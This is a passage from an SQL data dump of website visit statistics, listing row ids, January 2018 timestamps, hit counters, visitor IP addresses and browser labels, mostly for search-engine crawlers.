,1,0,0,'54.36.149.99','other'),(194727,1515071955,1,1,0,0,'54.36.148.33','other'),(194728,1515072155,1,1,0,0,'91.196.178.162','chrome'),(194729,1515072759,1,1,0,0,'54.36.149.70','other'),(194730,1515072770,1,1,0,0,'157.55.39.112','other'),(194731,1515072946,1,1,0,0,'159.89.42.242','other'),(194732,1515073516,1,1,0,0,'207.46.13.85','other'),(194733,1515073723,3,0,3,0,'66.249.69.35',''),(194734,1515073784,1,1,0,0,'91.196.178.67','chrome'),(194735,1515075272,1,1,0,0,'54.36.148.54','other'),(194736,1515075482,1,1,0,0,'54.36.148.233','other'),(194737,1515075624,1,1,0,0,'91.196.178.71','chrome'),(194738,1515076032,1,0,1,0,'66.249.69.35',''),(194739,1515076044,1,1,0,0,'178.95.12.68','chrome'),(194740,1515076400,1,1,0,0,'54.36.148.149','other'),(194741,1515076594,1,1,0,0,'54.36.149.48','other'),(194742,1515077169,1,1,0,0,'54.36.148.189','other'),(194743,1515077642,1,1,0,0,'66.249.69.35','chrome'),(194744,1515077859,1,1,0,0,'54.36.148.184','other'),(194745,1515077912,1,1,0,0,'66.249.69.221','chrome'),(194746,1515077985,1,1,0,0,'54.36.148.57','other'),(194747,1515078141,1,1,0,0,'54.36.148.173','other'),(194748,1515078173,1,1,0,0,'54.36.148.117','other'),(194749,1515078685,1,1,0,0,'54.36.148.113','other'),(194750,1515078751,1,1,0,0,'54.36.149.12','other'),(194751,1515079230,1,1,0,0,'37.9.113.182','other'),(194752,1515079379,1,1,0,0,'8.29.198.25','other'),(194753,1515079387,1,1,0,0,'54.36.148.167','other'),(194754,1515079580,1,1,0,0,'188.230.43.254','other'),(194755,1515079848,1,1,0,0,'35.226.23.240','other'),(194756,1515080294,1,1,0,0,'54.36.148.98','other'),(194757,1515080373,1,1,0,0,'54.36.148.50','other'),(194758,1515081506,1,1,0,0,'54.36.148.254','other'),(194759,1515081590,1,1,0,0,'54.36.148.87','other'),(194760,1515082356,1,1,0,0,'188.230.43.254','other'),(194761,1515082389,2,2,0,0,'207.46.13.85','other'),(194762,1515082421,1,1,0,0,'157.55.39.112','other'),(194763,1515082506,1,1,0,0,'35.153.255.221','other'),(194764,1515082528,1,1,0,0,'54.36.148.32','other'),(194765,1515082606,1,0,1,0,'66.249.69.35',''),(194766,1515083383,1,1,0,0,'54.36.149.95','other'),(194767,1515083471,1,1,0,0,'35.153.255.221','other'),(194768,1515084027,1,1,0,0,'54.36.148.197','other'),(194769,1515084110,1,1,0,0,'54.36.149.52','other'),(194770,1515084420,1,1,0,0,'35.153.255.221','other'),(194771,1515084758,1,1,0,0,'188.230.43.254','other'),(194772,1515084830,1,1,0,0,'178.255.215.94','other'),(194773,1515085286,1,0,1,0,'66.249.69.221',''),(194774,1515085562,1,1,0,0,'46.147.98.209','msie'),(194775,1515085614,1,1,0,0,'35.153.255.221','other'),(194776,1515085726,1,1,0,0,'207.46.13.85','other'),(194777,1515085984,1,1,0,0,'54.36.148.168','other'),(194778,1515086081,1,1,0,0,'95.132.35.92','chrome'),(194779,1515086311,1,1,0,0,'199.58.86.209','other'),(194780,1515086533,1,1,0,0,'35.153.255.221','other'),(194781,1515086968,1,1,0,0,'54.36.149.32','other'),(194782,1515087008,1,1,0,0,'130.180.208.224','chrome'),(194783,1515087075,1,1,0,0,'54.36.148.35','other'),(194784,1515087151,1,1,0,0,'188.230.43.254','other'),(194785,1515087200,1,1,0,0,'91.196.178.68','firefox'),(194786,1515087342,1,1,0,0,'54.36.148.70','other'),(194787,1515087375,1,1,0,0,'54.36.148.134','other'),(194788,1515087412,1,1,0,0,'157.55.39.132','other'),(194789,1515087484,1,1,0,0,'35.153.255.221','other'),(194790,1515087810,1,1,0,0,'54.36.148.125','other'),(194791,1515088392,1,1,0,0,'35.153.255.221','other'),(194792,1515088636,1,1,0,0,'92.113.127.180','chrome'),(194793,1515088637,1,1,0,0,'54.36.148.147','other'),(194794,1515089095,1,1,0,0,'207.46.13.181','other'),(194795,1515089293,1,1,0,0,'35.153.255.221','other'),(194796,1515089510,1,1,0,0,'54.36.148.116','other'),(194797,1515089549,1,1,0,0,'188.230.43.254','other'),(194798,1515089585,1,1,0,0,'54.36.148.98','other'),(194799,1515089679,2,2,0,0,'157.55.39.112','other'),(194800,1515090073,1,1,0,0,'54.36.148.18','other'),(194801,1515090213,1,1,0,0,'8.29.198.25','other'),(194802,1515090239,1,1,0,0,'35.153.255.221','other'),(194803,1515090589,1,1,0,0,'54.36.148.15','other'),(194804,1515090699,1,1,0,0,'54.36.149.98','other'),(194805,1515090741,1,1,0,0,'51.255.71.125','other'),(194806,1515090891,1,1,0,0,'54.36.148.51','other'),(194807,1515091357,1,1,0,0,'35.153.255.221','other'),(194808,1515091842,1,1,0,0,'157.55.39.112','other'),(194809,1515092251,1,1,0,0,'54.36.148.169','other'),(194810,1515092278,1,1,0,0,'91.196.178.34','chrome'),(194811,1515092298,1,1,0,0,'35.153.255.221','other'),(194812,1515092856,1,1,0,0,'54.36.148.176','other'),(194813,1515092872,1,1,0,0,'54.36.148.149','other'),(194814,1515093071,1,1,0,0,'54.36.149.37','other'),(194815,1515093101,1,1,0,0,'195.64.162.4','firefox'),(194816,1515093721,1,1,0,0,'54.36.148.165','other'),(194817,1515094038,1,1,0,0,'91.196.178.37','chrome'),(194818,1515094198,1,1,0,0,'54.36.149.7','other'),(194819,1515094398,1,1,0,0,'54.36.148.41','other'),(194820,1515094807,1,1,0,0,'54.36.149.75','other'),(194821,1515095326,1,1,0,0,'54.36.148.184','other'),(194822,1515095643,1,1,0,0,'91.210.146.115','chrome'),(194823,1515096169,1,1,0,0,'54.36.148.49','other'),(194824,1515096527,1,1,0,0,'54.36.148.70','other'),(194825,1515096688,1,1,0,0,'54.36.149.73','other'),(194826,1515096764,1,1,0,0,'54.36.148.99','other'),(194827,1515096935,1,1,0,0,'54.36.148.53','other'),(194828,1515097843,1,1,0,0,'54.36.148.71','other'),(194829,1515098035,1,1,0,0,'54.36.149.71','other'),(194830,1515098401,1,1,0,0,'188.230.43.254','other'),(194831,1515098907,1,1,0,0,'54.36.148.58','other'),(194832,1515099327,1,1,0,0,'54.36.149.15','other'),(194833,1515099703,1,1,0,0,'54.36.149.38','other'),(194834,1515099860,1,1,0,0,'54.36.149.33','other'),(194835,1515100023,2,2,0,0,'35.226.23.240','other'),(194836,1515100267,1,1,0,0,'157.55.39.112','other'),(194837,1515100378,1,1,0,0,'54.36.149.78','other'),(194838,1515100633,1,1,0,0,'54.36.148.189','other'),(194839,1515100807,1,1,0,0,'188.230.43.254','other'),(194840,1515101052,1,1,0,0,'8.29.198.26','other'),(194841,1515101065,1,1,0,0,'54.36.149.21','other'),(194842,1515103034,1,1,0,0,'207.46.13.181','other'),(194843,1515103711,1,1,0,0,'95.24.206.183','msie'),(194844,1515105441,5,5,0,0,'62.210.101.101','other'),(194845,1515105974,1,1,0,0,'157.55.39.112','other'),(194846,1515106617,1,1,0,0,'157.55.39.132','other'),(194847,1515108788,1,1,0,0,'54.36.148.248','other'),(194848,1515108839,1,1,0,0,'37.57.70.201','firefox'),(194849,1515108872,1,1,0,0,'54.36.148.47','other'),(194850,1515108883,1,1,0,0,'54.36.148.81','other'),(194851,1515109215,1,1,0,0,'54.36.148.86','other'),(194852,1515109306,1,1,0,0,'54.36.148.37','other'),(194853,1515109399,1,1,0,0,'54.36.148.110','other'),(194854,1515109443,1,1,0,0,'54.36.148.115','other'),(194855,1515109774,1,0,1,0,'66.249.69.41',''),(194856,1515109822,1,1,0,0,'54.36.148.49','other'),(194857,1515109936,1,1,0,0,'91.209.11.236','other'),(194858,1515110085,1,1,0,0,'54.36.149.80','other'),(194859,1515110259,1,1,0,0,'54.36.148.57','other'),(194860,1515110446,1,1,0,0,'54.36.148.31','other'),(194861,1515110506,1,1,0,0,'157.55.39.112','other'),(194862,1515110517,1,1,0,0,'207.46.13.181','other'),(194863,1515111053,1,1,0,0,'54.36.148.240','other'),(194864,1515111117,1,1,0,0,'54.36.148.107','other'),(194865,1515111736,1,1,0,0,'157.55.39.132','other'),(194866,1515111895,1,1,0,0,'8.29.198.25','other'),(194867,1515112840,1,1,0,0,'54.36.148.100','other'),(194868,1515112886,1,1,0,0,'54.36.148.13','other'),(194869,1515112974,1,1,0,0,'54.36.148.102','other'),(194870,1515113336,1,1,0,0,'141.8.142.74','other'),(194871,1515114311,1,1,0,0,'54.36.148.92','other'),(194872,1515114336,4,4,0,0,'37.187.75.71','other'),(194873,1515114410,1,1,0,0,'54.36.148.40','other'),(194874,1515114896,2,2,0,0,'141.8.142.74','other'),(194875,1515115001,1,1,0,0,'54.36.148.252','other'),(194876,1515115065,1,1,0,0,'54.36.148.193','other'),(194877,1515115310,1,1,0,0,'35.226.23.240','other'),(194878,1515115353,1,1,0,0,'54.36.148.35','other'),(194879,1515115401,1,1,0,0,'54.36.148.230','other'),(194880,1515115694,1,1,0,0,'54.36.148.131','other'),(194881,1515115721,1,0,1,0,'66.249.69.41',''),(194882,1515115969,1,1,0,0,'54.36.148.21','other'),(194883,1515115989,1,1,0,0,'54.36.148.160','other'),(194884,1515116011,1,1,0,0,'141.8.142.74','other'),(194885,1515116336,1,1,0,0,'51.255.71.131','other'),(194886,1515117700,1,1,0,0,'54.36.149.79','other'),(194887,1515117727,1,1,0,0,'51.255.71.133','other'),(194888,1515117957,1,0,1,0,'66.249.69.41',''),(194889,1515118076,1,1,0,0,'54.36.148.180','other'),(194890,1515118078,1,1,0,0,'54.36.148.205','other'),(194891,1515118193,1,1,0,0,'54.36.148.75','other'),(194892,1515118846,1,0,1,0,'66.249.69.61',''),(194893,1515119702,1,1,0,0,'54.36.149.78','other'),(194894,1515119903,1,1,0,0,'157.55.39.112','other'),(194895,1515120218,1,1,0,0,'54.36.148.181','other'),(194896,1515120352,2,2,0,0,'178.238.224.129','other'),(194897,1515120602,1,1,0,0,'54.36.148.152','other'),(194898,1515121097,2,2,0,0,'163.172.255.139','chrome'),(194899,1515121375,1,1,0,0,'141.8.142.74','other'),(194900,1515121439,1,1,0,0,'66.249.69.99','chrome'),(194901,1515121455,1,0,1,0,'66.249.69.103',''),(194902,1515121946,1,1,0,0,'54.36.149.88','other'),(194903,1515122050,1,1,0,0,'54.36.149.84','other'),(194904,1515122159,1,1,0,0,'54.36.148.15','other'),(194905,1515122231,1,1,0,0,'54.36.149.11','other'),(194906,1515122479,1,1,0,0,'54.36.148.93','other'),(194907,1515122725,1,1,0,0,'8.29.198.26','other'),(194908,1515122843,1,1,0,0,'54.36.148.59','other'),(194909,1515122864,1,1,0,0,'51.255.71.117','other'),(194910,1515123058,1,1,0,0,'54.36.148.31','other'),(194911,1515123320,1,1,0,0,'51.255.71.130','other'),(194912,1515123416,1,1,0,0,'54.36.148.141','other'),(194913,1515123593,1,1,0,0,'54.36.148.83','other'),(194914,1515123704,1,1,0,0,'54.36.148.72','other'),(194915,1515123712,1,1,0,0,'54.36.149.7','other'),(194916,1515123719,1,1,0,0,'54.36.148.137','other'),(194917,1515123820,1,1,0,0,'54.36.148.53','other'),(194918,1515124346,1,1,0,0,'54.36.148.66','other'),(194919,1515124622,1,1,0,0,'54.36.148.104','other'),(194920,1515125113,2,0,2,0,'66.249.69.103',''),(194921,1515125180,1,1,0,0,'54.36.149.0','other'),(194922,1515125615,1,1,0,0,'207.46.13.181','other'),(194923,1515125737,1,0,1,0,'66.249.69.99',''),(194924,1515126208,1,1,0,0,'54.36.149.15','other'),(194925,1515126263,1,1,0,0,'54.36.148.142','other'),(194926,1515126722,1,1,0,0,'54.36.148.37','other'),(194927,1515126795,1,1,0,0,'54.36.149.79','other'),(194928,1515126846,1,1,0,0,'54.36.148.53','other'),(194929,1515126873,1,1,0,0,'141.8.142.74','other'),(194930,1515127226,1,1,0,0,'66.249.69.105','chrome'),(194931,1515127234,1,1,0,0,'54.36.148.149','other'),(194932,1515127609,1,1,0,0,'54.36.148.57','other'),(194933,1515127818,1,1,0,0,'188.244.32.76','msie'),(194934,1515127950,1,1,0,0,'54.36.148.247','other'),(194935,1515128193,1,1,0,0,'54.36.149.0','other'),(194936,1515128509,1,1,0,0,'54.36.149.73','other'),(194937,1515128653,1,1,0,0,'54.36.149.26','other'),(194938,1515128758,1,1,0,0,'35.226.23.240','other'),(194939,1515129093,1,1,0,0,'54.36.149.11','other'),(194940,1515129266,1,1,0,0,'54.36.148.132','other'),(194941,1515129488,1,1,0,0,'178.154.171.88','other'),(194942,1515129632,1,1,0,0,'157.55.39.112','other'),(194943,1515129796,1,1,0,0,'54.36.148.58','other'),(194944,1515129956,1,1,0,0,'54.36.148.123','other'),(194945,1515130273,1,1,0,0,'54.36.148.109','other'),(194946,1515130284,1,1,0,0,'54.36.148.124','other'),(194947,1515131849,1,1,0,0,'83.166.242.112','firefox'),(194948,1515132435,1,1,0,0,'54.36.148.238','other'),(194949,1515132701,1,1,0,0,'95.132.10.248','chrome'),(194950,1515132836,1,1,0,0,'54.36.148.46','other'),(194951,1515133550,1,1,0,0,'54.36.148.240','other'),(194952,1515133558,1,1,0,0,'8.29.198.26','other'),(194953,1515133779,1,1,0,0,'54.36.148.120','other'),(194954,1515133987,1,1,0,0,'54.36.148.255','other'),(194955,1515134278,1,1,0,0,'178.93.144.214','chrome'),(194956,1515134285,1,1,0,0,'54.36.149.12','other'),(194957,1515134379,1,1,0,0,'77.111.244.34','chrome'),(194958,1515134589,1,1,0,0,'178.154.171.88','other'),(194959,1515134787,1,1,0,0,'54.36.149.104','other'),(194960,1515134827,1,1,0,0,'54.36.148.186','other'),(194961,1515134981,1,1,0,0,'54.36.148.255','other'),(194962,1515135090,2,2,0,0,'91.196.178.72','chrome'),(194963,1515135253,1,1,0,0,'54.36.148.183','other'),(194964,1515135464,1,1,0,0,'54.36.149.22','other'),(194965,1515135550,1,1,0,0,'54.36.148.170','other'),(194966,1515135560,1,1,0,0,'54.36.148.28','other'),(194967,1515135902,1,1,0,0,'54.36.149.76','other'),(194968,1515136289,1,1,0,0,'54.36.149.77','other'),(194969,1515136343,1,1,0,0,'54.36.149.65','other'),(194970,1515137055,1,1,0,0,'92.112.222.177','chrome'),(194971,1515137086,1,1,0,0,'54.36.148.119','other'),(194972,1515137561,1,0,1,0,'66.249.69.103',''),(194973,1515137566,1,1,0,0,'51.255.71.122','other'),(194974,1515137968,1,1,0,0,'54.36.149.76','other'),(194975,1515138003,1,1,0,0,'157.55.39.112','other'),(194976,1515138523,1,1,0,0,'54.36.148.123','other'),(194977,1515138718,1,1,0,0,'195.230.119.34','chrome'),(194978,1515138780,1,1,0,0,'54.36.148.150','other'),(194979,1515138830,1,1,0,0,'54.36.148.174','other'),(194980,1515139238,1,1,0,0,'54.36.148.188','other'),(194981,1515139339,2,2,0,0,'91.196.178.72','firefox'),(194982,1515139606,1,1,0,0,'54.36.148.37','other'),(194983,1515139728,1,1,0,0,'54.36.148.166','other'),(194984,1515140554,1,1,0,0,'91.196.178.162','firefox'),(194985,1515140947,1,1,0,0,'91.196.178.166','firefox'),(194986,1515141090,60,60,0,0,'208.110.93.52','other'),(194987,1515141128,1,1,0,0,'193.110.18.53','chrome'),(194988,1515141576,1,1,0,0,'35.226.23.240','other'),(194989,1515141675,1,1,0,0,'216.244.66.237','other'),(194990,1515141814,1,1,0,0,'37.52.107.58','firefox'),(194991,1515141864,1,1,0,0,'54.36.148.20','other'),(194992,1515141967,1,1,0,0,'54.36.148.53','other'),(194993,1515142360,1,1,0,0,'54.36.149.18','other'),(194994,1515142504,1,1,0,0,'54.36.149.103','other'),(194995,1515142718,1,1,0,0,'35.226.23.240','other'),(194996,1515142909,1,1,0,0,'95.132.16.43','chrome'),(194997,1515143082,1,1,0,0,'54.36.149.9','other'),(194998,1515143359,1,1,0,0,'157.55.39.132','other'),(194999,1515143559,1,1,0,0,'54.36.149.53','other'),(195000,1515143837,1,1,0,0,'54.36.148.114','other'),(195001,1515143852,1,1,0,0,'54.36.148.198','other'),(195002,1515143975,1,1,0,0,'157.55.39.112','other'),(195003,1515144089,1,1,0,0,'95.135.6.154','chrome'),(195004,1515144130,1,1,0,0,'91.202.144.27','chrome'),(195005,1515144384,1,1,0,0,'8.29.198.25','other'),(195006,1515144521,1,1,0,0,'51.255.71.121','other'),(195007,1515144611,5,5,0,0,'95.85.38.241','other'),(195008,1515144852,1,1,0,0,'54.36.149.74','other'),(195009,1515144855,1,1,0,0,'13.56.229.65','chrome'),(195010,1515145171,1,1,0,0,'54.36.148.205','other'),(195011,1515145499,1,1,0,0,'51.255.71.116','other'),(195012,1515145507,1,1,0,0,'54.36.148.76','other'),(195013,1515145590,1,1,0,0,'91.196.178.162','chrome'),(195014,1515145598,1,1,0,0,'51.255.71.123','other'),(195015,1515145707,1,1,0,0,'54.36.149.84','other'),(195016,1515145800,2,2,0,0,'95.132.191.35','chrome'),(195017,1515146010,1,1,0,0,'54.36.149.0','other'),(195018,1515146071,1,1,0,0,'54.36.149.44','other'),(195019,1515146374,1,1,0,0,'54.36.148.254','other'),(195020,1515146598,1,1,0,0,'54.36.148.116','other'),(195021,1515146698,1,1,0,0,'54.36.148.86','other'),(195022,1515146967,26,26,0,0,'5.9.62.130','other'),(195023,1515147030,1,1,0,0,'216.244.66.237','other'),(195024,1515147063,1,1,0,0,'54.36.148.207','other'),(195025,1515147209,1,1,0,0,'91.196.178.161','chrome'),(195026,1515147413,1,1,0,0,'91.124.83.71','chrome'),(195027,1515147489,1,1,0,0,'54.36.149.32','other'),(195028,1515147647,1,0,1,0,'66.249.69.105',''),(195029,1515147928,1,1,0,0,'54.36.148.80','other'),(195030,1515148500,1,1,0,0,'54.36.148.132','other'),(195031,1515148527,1,1,0,0,'95.132.56.196','firefox'),(195032,1515149032,1,1,0,0,'54.36.149.53','other'),(195033,1515149491,1,1,0,0,'141.8.142.74','other'),(195034,1515149567,3,3,0,0,'91.196.178.161','chrome'),(195035,1515149667,1,1,0,0,'54.36.148.135','other'),(195036,1515149951,1,1,0,0,'54.36.149.66','other'),(195037,1515150154,1,1,0,0,'157.55.39.152','other'),(195038,1515150829,3,3,0,0,'157.55.39.112','other'),(195039,1515151048,1,1,0,0,'54.36.148.43','other'),(195040,1515151375,1,1,0,0,'54.36.148.91','other'),(195041,1515151393,1,0,1,0,'66.249.69.105',''),(195042,1515151406,1,1,0,0,'95.132.191.35','chrome'),(195043,1515151433,1,1,0,0,'54.36.148.231','other'),(195044,1515151532,1,1,0,0,'51.255.71.126','other'),(195045,1515152420,1,1,0,0,'37.9.113.182','other'),(195046,1515152479,1,1,0,0,'188.32.189.107','msie'),(195047,1515152729,1,1,0,0,'54.36.148.26','other'),(195048,1515152843,1,1,0,0,'54.36.149.29','other'),(195049,1515152887,1,1,0,0,'54.36.149.89','other'),(195050,1515153098,1,1,0,0,'31.43.12.32','chrome'),(195051,1515153209,1,1,0,0,'54.36.148.234','other'),(195052,1515153227,1,1,0,0,'54.36.149.105','other'),(195053,1515153636,1,1,0,0,'54.36.149.50','other'),(195054,1515153750,1,1,0,0,'141.8.142.74','other'),(195055,1515154174,1,1,0,0,'54.36.148.173','other'),(195056,1515154192,1,1,0,0,'54.36.149.9','other'),(195057,1515154294,1,1,0,0,'54.36.149.7','other'),(195058,1515154776,1,1,0,0,'37.9.113.115','other'),(195059,1515154799,1,1,0,0,'157.55.39.112','other'),(195060,1515154893,1,1,0,0,'54.36.148.247','other'),(195061,1515155035,1,1,0,0,'94.178.212.232','chrome'),(195062,1515155218,1,1,0,0,'8.29.198.27','other'),(195063,1515155596,1,1,0,0,'217.117.64.208','firefox'),(195064,1515155897,1,1,0,0,'54.36.148.166','other'),(195065,1515156173,1,1,0,0,'54.36.148.13','other'),(195066,1515156284,1,1,0,0,'157.55.39.132','other'),(195067,1515156794,1,1,0,0,'157.55.39.152','other'),(195068,1515156823,1,1,0,0,'95.132.21.17','firefox'),(195069,1515156989,1,1,0,0,'54.36.149.105','other'),(195070,1515157180,1,1,0,0,'77.111.244.58','chrome'),(195071,1515157232,1,1,0,0,'54.36.149.87','other'),(195072,1515157239,2,2,0,0,'141.8.142.74','other'),(195073,1515157402,1,1,0,0,'54.36.148.232','other'),(195074,1515158135,1,1,0,0,'46.211.248.174','chrome'),(195075,1515158816,1,1,0,0,'54.36.148.109','other'),(195076,1515158875,1,1,0,0,'157.55.39.132','other'),(195077,1515160219,1,1,0,0,'54.36.149.91','other'),(195078,1515160369,1,1,0,0,'54.36.148.167','other'),(195079,1515160545,1,1,0,0,'54.36.148.229','other'),(195080,1515160649,1,1,0,0,'74.115.214.132','other'),(195081,1515160650,1,1,0,0,'74.115.214.144','other'),(195082,1515160865,15,15,0,0,'23.237.4.26','other'),(195083,1515161286,1,1,0,0,'91.196.178.69','firefox'),(195084,1515161428,2,2,0,0,'35.226.23.240','other'),(195085,1515161602,1,1,0,0,'54.36.148.136','other'),(195086,1515161846,1,1,0,0,'54.36.148.184','other'),(195087,1515161855,1,1,0,0,'157.55.39.44','other'),(195088,1515161920,1,1,0,0,'54.36.149.87','other'),(195089,1515162243,1,1,0,0,'141.8.142.74','other'),(195090,1515162263,1,1,0,0,'54.36.148.200','other'),(195091,1515162404,1,1,0,0,'54.36.148.253','other'),(195092,1515162495,1,1,0,0,'51.255.71.119','other'),(195093,1515162583,1,1,0,0,'54.36.148.21','other'),(195094,1515162607,1,1,0,0,'54.36.148.100','other'),(195095,1515162756,1,1,0,0,'54.36.149.8','other'),(195096,1515163244,1,1,0,0,'54.36.148.162','other'),(195097,1515163254,1,1,0,0,'54.36.148.93','other'),(195098,1515163255,1,1,0,0,'162.210.196.97','other'),(195099,1515163261,1,1,0,0,'157.55.39.44','other'),(195100,1515163373,1,1,0,0,'54.36.148.117','other'),(195101,1515164509,1,1,0,0,'54.36.148.55','other'),(195102,1515164605,1,1,0,0,'54.36.148.46','other'),(195103,1515164945,1,1,0,0,'157.55.39.132','other'),(195104,1515165575,1,1,0,0,'54.36.148.15','other'),(195105,1515165945,1,1,0,0,'54.36.149.92','other'),(195106,1515166008,2,1,1,0,'66.249.69.99',''),(195107,1515166039,1,1,0,0,'66.249.69.57','chrome'),(195108,1515166045,1,1,0,0,'188.230.43.254','other'),(195109,1515166068,1,1,0,0,'8.29.198.26','other'),(195110,1515166274,2,2,0,0,'157.55.39.152','other'),(195111,1515166744,1,1,0,0,'194.183.183.82','chrome'),(195112,1515166749,1,1,0,0,'141.8.142.74','other'),(195113,1515166806,1,1,0,0,'54.36.148.93','other'),(195114,1515166811,1,1,0,0,'54.36.149.93','other'),(195115,1515167177,1,1,0,0,'66.249.69.105','chrome'),(195116,1515167351,1,0,1,0,'66.249.69.99',''),(195117,1515167555,1,1,0,0,'188.230.43.254','other'),(195118,1515167579,1,1,0,0,'54.36.148.39','other'),(195119,1515167649,1,0,1,0,'66.249.69.61',''),(195120,1515167700,1,1,0,0,'54.36.148.179','other'),(195121,1515167879,1,1,0,0,'54.36.148.73','other'),(195122,1515167889,1,1,0,0,'54.36.149.12','other'),(195123,1515168032,1,1,0,0,'54.36.148.123','other'),(195124,1515168362,1,1,0,0,'54.36.149.93','other'),(195125,1515168509,1,1,0,0,'54.36.148.158','other'),(195126,1515168724,1,1,0,0,'54.36.149.33','other'),(195127,1515169401,1,1,0,0,'188.230.43.254','other'),(195128,1515170201,1,1,0,0,'199.30.24.173','other'),(195129,1515170365,1,1,0,0,'91.196.178.34','chrome'),(195130,1515170573,1,1,0,0,'91.196.178.167','chrome'),(195131,1515170651,1,1,0,0,'54.36.149.13','other'),(195132,1515170717,1,0,1,0,'66.249.69.103',''),(195133,1515170756,1,1,0,0,'54.36.148.91','other'),(195134,1515170796,1,1,0,0,'54.36.149.11','other'),(195135,1515170806,1,1,0,0,'54.36.148.140','other'),(195136,1515171487,1,1,0,0,'54.36.148.234','other'),(195137,1515171570,1,1,0,0,'54.36.148.20','other'),(195138,1515171649,1,1,0,0,'91.196.178.4','chrome'),(195139,1515171735,1,0,1,0,'66.249.69.99',''),(195140,1515171780,5,5,0,0,'93.104.211.246','other'),(195141,1515171792,1,1,0,0,'188.230.43.254','other'),(195142,1515172392,1,1,0,0,'54.36.149.99','other'),(195143,1515172633,1,1,0,0,'141.8.142.74','other'),(195144,1515172821,1,1,0,0,'54.36.148.158','other'),(195145,1515172852,1,1,0,0,'54.36.148.132','other'),(195146,1515172861,1,1,0,0,'91.196.178.166','chrome'),(195147,1515173510,1,1,0,0,'54.36.148.99','other'),(195148,1515173789,1,1,0,0,'54.36.148.26','other'),(195149,1515173861,1,1,0,0,'178.154.171.88','other'),(195150,1515174009,1,1,0,0,'188.230.43.254','other'),(195151,1515174264,1,1,0,0,'51.255.71.119','other'),(195152,1515174403,1,1,0,0,'157.55.39.44','other'),(195153,1515174977,1,0,1,0,'66.249.69.111',''),(195154,1515175358,1,1,0,0,'157.55.39.132','other'),(195155,1515175465,1,1,0,0,'195.54.42.28','chrome'),(195156,1515175503,1,1,0,0,'216.244.66.237','other'),(195157,1515175557,1,1,0,0,'157.55.39.109','other'),(195158,1515175587,1,1,0,0,'54.36.149.79','other'),(195159,1515175855,1,1,0,0,'157.55.39.152','other'),(195160,1515175994,1,1,0,0,'188.230.43.254','other'),(195161,1515176228,1,1,0,0,'54.36.149.80','other'),(195162,1515176519,1,1,0,0,'54.36.148.17','other'),(195163,1515176764,1,1,0,0,'54.36.149.57','other'),(195164,1515176911,1,1,0,0,'8.29.198.27','other'),(195165,1515176984,1,1,0,0,'54.36.148.131','other'),(195166,1515177846,1,1,0,0,'54.36.148.244','other'),(195167,1515177951,1,1,0,0,'46.200.118.111','chrome'),(195168,1515178364,1,1,0,0,'54.36.149.28','other'),(195169,1515178478,1,1,0,0,'157.55.39.152','other'),(195170,1515178802,1,1,0,0,'54.36.149.24','other'),(195171,1515178952,1,1,0,0,'54.36.148.199','other'),(195172,1515179006,1,1,0,0,'51.255.71.129','other'),(195173,1515179112,1,1,0,0,'157.55.39.132','other'),(195174,1515179115,1,1,0,0,'157.55.39.109','other'),(195175,1515179141,1,1,0,0,'54.36.148.19','other'),(195176,1515179635,1,1,0,0,'95.132.99.156','chrome'),(195177,1515179663,1,1,0,0,'54.36.149.36','other'),(195178,1515180025,1,1,0,0,'54.36.148.206','other'),(195179,1515180354,1,1,0,0,'54.36.149.81','other'),(195180,1515180412,1,1,0,0,'54.36.148.160','other'),(195181,1515180689,1,1,0,0,'54.36.149.3','other'),(195182,1515180714,1,1,0,0,'54.36.148.201','other'),(195183,1515180778,1,1,0,0,'54.36.148.241','other'),(195184,1515180933,1,1,0,0,'54.36.148.101','other'),(195185,1515181092,1,1,0,0,'157.55.39.44','other'),(195186,1515181328,1,1,0,0,'54.36.148.24','other'),(195187,1515181809,1,1,0,0,'54.36.148.95','other'),(195188,1515182201,1,1,0,0,'54.36.148.36','other'),(195189,1515182323,1,0,1,0,'66.249.69.111',''),(195190,1515182389,1,1,0,0,'54.36.148.115','other'),(195191,1515182468,1,1,0,0,'54.36.148.60','other'),(195192,1515182483,2,2,0,0,'216.244.66.237','other'),(195193,1515182498,1,1,0,0,'54.36.149.8','other'),(195194,1515182939,1,1,0,0,'157.55.39.152','other'),(195195,1515183104,1,1,0,0,'141.8.142.74','other'),(195196,1515183295,1,1,0,0,'54.36.148.148','other'),(195197,1515183483,1,1,0,0,'54.36.148.85','other'),(195198,1515183702,1,1,0,0,'54.36.148.99','other'),(195199,1515183756,1,1,0,0,'157.55.39.132','other'),(195200,1515184858,1,1,0,0,'54.36.148.153','other'),(195201,1515185177,1,1,0,0,'54.36.148.185','other'),(195202,1515185518,1,1,0,0,'54.36.149.24','other'),(195203,1515185618,1,1,0,0,'213.87.136.102','other'),(195204,1515185735,1,1,0,0,'157.185.131.186','chrome'),(195205,1515185972,1,1,0,0,'54.36.148.19','other'),(195206,1515186011,1,1,0,0,'54.36.148.125','other'),(195207,1515186024,1,1,0,0,'54.36.148.119','other'),(195208,1515186169,1,1,0,0,'54.36.148.105','other'),(195209,1515186451,1,1,0,0,'54.36.149.107','other'),(195210,1515186616,1,1,0,0,'54.36.148.52','other'),(195211,1515186899,1,1,0,0,'141.8.142.74','other'),(195212,1515187115,1,0,1,0,'66.249.69.61',''),(195213,1515187660,2,2,0,0,'91.121.86.136','other'),(195214,1515187771,1,1,0,0,'8.29.198.25','other'),(195215,1515187832,1,1,0,0,'54.36.149.2','other'),(195216,1515187877,1,1,0,0,'51.255.71.121','other'),(195217,1515188012,1,1,0,0,'54.36.149.52','other'),(195218,1515188337,1,1,0,0,'54.36.148.103','other'),(195219,1515188645,1,1,0,0,'54.36.149.88','other'),(195220,1515189300,1,1,0,0,'157.55.39.152','other'),(195221,1515189910,1,1,0,0,'157.55.39.44','other'),(195222,1515190022,1,1,0,0,'54.36.148.35','other'),(195223,1515190112,1,1,0,0,'54.36.148.134','other'),(195224,1515190394,1,1,0,0,'54.36.148.237','other'),(195225,1515190452,1,1,0,0,'54.36.148.250','other'),(195226,1515190943,1,0,1,0,'66.249.69.121',''),(195227,1515191205,1,1,0,0,'54.36.149.29','other'),(195228,1515191256,1,1,0,0,'54.36.149.71','other'),(195229,1515191409,1,1,0,0,'54.36.148.47','other'),(195230,1515191504,1,1,0,0,'54.36.148.130','other'),(195231,1515191692,1,1,0,0,'54.36.148.44','other'),(195232,1515191963,1,1,0,0,'54.36.148.33','other'),(195233,1515192254,1,1,0,0,'95.27.67.189','msie'),(195234,1515192450,1,1,0,0,'18.221.126.65','chrome'),(195235,1515192580,1,1,0,0,'54.36.148.141','other'),(195236,1515192753,1,1,0,0,'54.36.148.233','other'),(195237,1515192915,1,1,0,0,'54.36.148.192','other'),(195238,1515192995,1,0,1,0,'66.249.69.119',''),(195239,1515193676,1,1,0,0,'54.36.148.141','other'),(1952